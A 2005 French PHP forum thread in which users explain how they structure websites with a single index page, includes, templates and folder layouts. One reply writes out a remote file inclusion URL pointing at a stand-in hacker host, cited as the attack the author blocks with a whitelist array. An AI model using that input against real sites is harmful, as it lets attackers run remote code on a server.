Partage
  • Partager sur Facebook
  • Partager sur Twitter

Programmation d'un script

Un peu de méthode !

    27 novembre 2005 à 22:29:47

    Salut,
    voila je venais à vous car j'arrive à un cap ou la connaissance php est suffisante pour programmer presque tout les trucs de base.
    Le seul problème c'est que maintenant avec des projets plus gros et ambitieux, certaines faiblesses remontent à la surface.
    Je manque d'organisation et de méthode de programmation. :(

    C'est à dire que soit je me retrouve avec 20 000 fichiers sur mon site, soit avec 25 fois le même formulaire pour éditer(news/commentaires etc..)
    Alors j'aimerai savoir comment vous ( si possible ceux qui un peu d'expérience pour avoir du recul) faite.
    Comment vous organisez vous coté Architecture (système pyramidale ?), ou tous vos fichiers qui sont appelés sur une même page avec un $_get.
    Et coté code, pour éviter d'avoir 20 fois le même formulaire à écrire sans pour autant s'en servir pour la même chose comment le gérer vous, pareil pour sql et ses connections.
    bref votre organisation..

    merci d'avance énormément, j'espère que vous m'éclairerai ^^
    • Partager sur Facebook
    • Partager sur Twitter
      27 novembre 2005 à 22:32:40

      Personnellement, lorsque j'ai besoin d'utiliser plusieurs fois le même formulaire, si c'est pour l'afficher à chaque fois dans les mêmes circonstances, je fais une fonction: simple, pas de répétition de code...
      Ensuite, si tu dois parfois l'afficher vide, des fois plein, à toi de faire en sorte de passer des paramètres dans ta fonction, des paramètres qui te permettront de remplir/cocher les champs présent... :)
      • Partager sur Facebook
      • Partager sur Twitter
        27 novembre 2005 à 22:38:48

        J'ai pas bcp d'XP, je suis je dirai comme toi.

        Ce que je fais, j'essaye tjr d'avoir une seule page avec pleins de GETS ou au pire le minimum de page.

        Coté organisation, bah une seule page, ça va...

        Comment je commence mon script ??

        Tjr par le XHTML, puis le CSS et enfin le PHP. Je fais pas tout le PHP d'un coup, je faos progressivement, je commence par le plus simple et finis par le plus dur ;)

        Voila !
        • Partager sur Facebook
        • Partager sur Twitter
          27 novembre 2005 à 22:39:10

          J'ai tout d'abord un fichier index avec tous les appels aux fichiers de configurations. Ensuite selon la demande (par url) j'inclue le fichier demandé (je mets les fichiers "corps" dans un repertoire pour que le FTP soit mieux organisé)
          J'utilise des templates, donc côté formulaire qui se répète, je n'ai pas trop de problème. J'ai également un <div> qui contient les erreurs s'il y en a (si il n'y en a pas, le div ne s'affiche pas). Pour information, j'utilise smarty comme moteur de templates, et je le trouve bien, je n'ai pas encore eu de problèmes.
          En gros mon FTP c'est ça :
          - index.php
          - pages
          -- accueil.php
          -- livreor.php
          -- ...
          - skins
          -- defaut
          --- templates
          --- style.css
          --- infos.php
          -- ...
          - requires
          -- index.php
          -- corps.php
          -- ...
          - class
          -- sql.php
          -- erreur.php
          -- templates.php
          -- ...
          - langs
          -- fr
          --- infos.php
          --- general.php
          --- accueil.php
          --- livreor.php
          --- ...
          -- en
          --- ...
          -- ...
          - erreurs.log

          Voilà à peu près à quoi ressemble mon FTP, je pense qu'il est assez organisé, je n'ai pas trop de problèmes de méthode il me semble.
          • Partager sur Facebook
          • Partager sur Twitter
            27 novembre 2005 à 22:45:39

            Citation : Baptiste


            En gros mon FTP c'est ça :
            - index.php
            - pages
            -- accueil.php
            -- livreor.php
            -- ...
            - skins
            -- defaut
            --- templates
            --- style.css
            --- infos.php
            -- ...
            - requires
            -- index.php
            -- corps.php
            -- ...
            - class
            -- sql.php
            -- erreur.php
            -- templates.php
            -- ...
            - langs
            -- fr
            --- infos.php
            --- general.php
            --- accueil.php
            --- livreor.php
            --- ...
            -- en
            --- ...
            -- ...
            - erreurs.log

            Voilà à peu près à quoi ressemble mon FTP, je pense qu'il est assez organisé, je n'ai pas trop de problèmes de méthode il me semble.


            Merci pour vos réponses, c'est vrai qu'avec un exemple, c'est toujours mieux pour projeter la chose dans son cerveau :) .

            Sinon Baptiste, lorsque tu vas sur ton site le corps par default , c'est lequel ? accueil je suppose vu son nom
            Que contienne les autres fichiers ca sera sympa de le mettre sur leur droite pour bien analyser ;)

            merci
            • Partager sur Facebook
            • Partager sur Twitter
              27 novembre 2005 à 22:54:17

              - index.php -> appelle tous les fichiers de configurations (les class, les fichiers dans le repertoire requires etc...
              - pages -> contient toutes les pages pouvant être appelées dans le "corps" : une page par "module"
              -- accueil.php
              -- livreor.php
              -- ...
              - skins -> contient tous les skins
              -- defaut -> contient le skin par défaut
              --- templates -> contient les fichiers de templates
              ---- ...
              --- style.css -> feuille de style
              --- infos.php -> contient des infos sur le skins (designers, codeurs...)
              -- ...
              - requires -> repertoires contenants les fichiers de configs
              -- index.php -> fichier qui appelle toutes les pages necessaires et crée les class
              -- corps.php -> fichier qui gère le corps de la page
              -- ...
              - class -> repertoire qui contient les class :p
              -- sql.php -> class sql
              -- erreur.php -> class d'erreur
              -- templates.php -> class de templates
              -- ...
              - langs -> repertoire contenant les repertoires de langue
              -- fr -> repertoire pour la langue française
              --- infos.php -> infos sur la langue (auteur des fichiers, abréviations...)
              --- general.php -> fichier contenant les traductions de la page en général (menus, header, footer...)
              --- accueil.php -> fichier contenant les traductions de la page d'accueil
              --- livreor.php -> ...
              --- ...
              -- en -> ...
              --- ...
              -- ...
              - erreurs.log -> fichier référençant toutes les erreurs recensées

              Voilà, si tu as des questions, n'hésite pas.
              En fait la page index.php appelle seulement la page requires/index.php qui, elle appelle toutes les autres.

              Bonne continuation
              • Partager sur Facebook
              • Partager sur Twitter
                27 novembre 2005 à 23:06:44

                Moi pour travailler le meilleur moyen je pense que c'est "de mettre tout a plat"
                Tu ecrit ce que tu veut ce que tu va utiliser ton code en sera beaucoup plus clair car tu sera ou tu va et ce que tu fait.
                Bonne chance pour la suite
                ++
                • Partager sur Facebook
                • Partager sur Twitter
                  27 novembre 2005 à 23:14:57

                  Citation : Keumar

                  Moi pour travailler le meilleur moyen je pense que c'est "de mettre tout a plat"
                  Tu ecrit ce que tu veut ce que tu va utiliser ton code en sera beaucoup plus clair car tu sera ou tu va et ce que tu fait.
                  Bonne chance pour la suite
                  ++


                  Que veut tu dire par "mettre à plat" ?

                  merci Baptiste ;)
                  • Partager sur Facebook
                  • Partager sur Twitter
                    27 novembre 2005 à 23:29:57

                    "mettre a plat" c'est prendre un papier et un crayon
                    tu ecrit ce que tu veut faire tu décompose en petit morceau en réfléchissant bien a ce que tu fait.
                    Ca peut paraitre con mais je fait omme ca et tu remarquera que meme dans les cour de mateo il te conseil comme ca.
                    ++
                    • Partager sur Facebook
                    • Partager sur Twitter
                      28 novembre 2005 à 0:19:47

                      Perso pour mon organisation, j'utilise des include.

                      Je fais un peu comme Baptiste.

                      Je crée une unique page index.php.

                      je crée mes liens <a href="?page=5">
                      et avec :

                      <?
                      switch ($page)  {
                      case 1 : include("rep/fichier.php"); break;
                      case 2 : include("rep/fichier2.php"); break;
                      }
                      ?>


                      Et comme ca, tu organise ton ftp avec des dossiers et seulement avec des .html, que tu inclu dans le corp de ta page, sans touché a ton menu, ni ton entête...

                      Code ca le code de ton index est unique, et tu écrit juste du contenu.
                      • Partager sur Facebook
                      • Partager sur Twitter
                        28 novembre 2005 à 15:08:42

                        Vous faites tous de cette façon ?
                        Que je vois que plus personne y répond.
                        • Partager sur Facebook
                        • Partager sur Twitter
                          28 novembre 2005 à 15:14:18

                          +1 pour l'organisation en include....

                          Cherche un post de bison qui parle des includes et des array... Il est pas mal...

                          Sinon Keumar, c'est qui ton avatar??? L'image existe en grand format??
                          • Partager sur Facebook
                          • Partager sur Twitter
                            28 novembre 2005 à 15:43:15

                            Citation : Hawks


                            Cherche un post de bison qui parle des includes et des array... Il est pas mal...
                            ?


                            J'ai fait recherche par mot et recherche par membres, je le trouve pas, trop de sujets now :-° .
                            Un petit lien serai sympa :)
                            • Partager sur Facebook
                            • Partager sur Twitter
                              28 novembre 2005 à 15:53:20

                              Je pense qu'il sagit de ce post : http://www.siteduzero.com/forum-83-430-include.html

                              Perso, j'utilise aussi les include et une page unique qui gère tout le site.


                              PS : Puma, t'as trouvé où ton avatar? Merci.
                              • Partager sur Facebook
                              • Partager sur Twitter
                                28 novembre 2005 à 16:05:10

                                Idem:
                                1 page index.php
                                et un repertoire par catégories genre
                                /news/
                                ->news_submit.php
                                ->news.php
                                ->etc…
                                /membres/
                                ->inscription.php
                                ->connection.php
                                ->etc…

                                et pour la sécurité je me serts d'un array assiossatif en externe pour pas pouvoir me faire machin.truc/?include=http://www.jetehack.com/hack.php

                                même si il n'y a absolument rien à hacker, ensuite je fait le script xhtml, puis le CSS, mais après ça depends de toi si tu es plus developpeur script ou developpeur environnement.
                                • Partager sur Facebook
                                • Partager sur Twitter
                                  29 novembre 2005 à 2:30:36

                                  Citation : iglopx

                                  Je pense qu'il sagit de ce post : http://www.siteduzero.com/forum-83-430-include.html



                                  Oui oui c'est bien celui la....
                                  • Partager sur Facebook
                                  • Partager sur Twitter

                                  Programmation d'un script

                                  × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
                                  × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
                                  • Editeur
                                  • Markdown